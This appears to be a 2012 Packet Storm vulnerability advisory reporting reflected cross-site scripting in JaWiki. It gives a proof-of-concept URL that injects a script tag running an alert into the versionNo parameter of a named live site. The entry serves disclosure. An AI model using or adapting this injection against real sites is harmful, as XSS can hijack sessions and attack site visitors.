JaWiki Cross Site Scripting

2012-02-17T00:00:00
ID PACKETSTORM:109851
Type packetstorm
Reporter Sony
Modified 2012-02-17T00:00:00

Description

                                        
                                            `# Exploit Title: JaWiki Cross Site Scripting  
# Date: 16.02.2012  
# Author: Sony  
# Software Link: http://sourceforge.net/projects/jawiki/  
# Web Browser : Mozilla Firefox  
# Blog : http://st2tea.blogspot.com  
# PoC:  
http://st2tea.blogspot.com/2012/02/jawiki-cross-site-scripting.html  
..................................................................  
  
Simple.  
  
  
http://www.schmiereck.de/jawiki/user/main/homepage?action=showVersion&versionNo=%3Cscript%3Ealert%28%22123%20xss%22%29%3C/script%3E  
  
http://2.bp.blogspot.com/-rA2rWKCX360/Tz0x3rjcm6I/AAAAAAAAAe4/Ln9d2pnKyuE/s1600/jawiki.JPG  
  
..................................................................  
  
InSecurity.Ro  
  
Because we care, we're security aware!  
`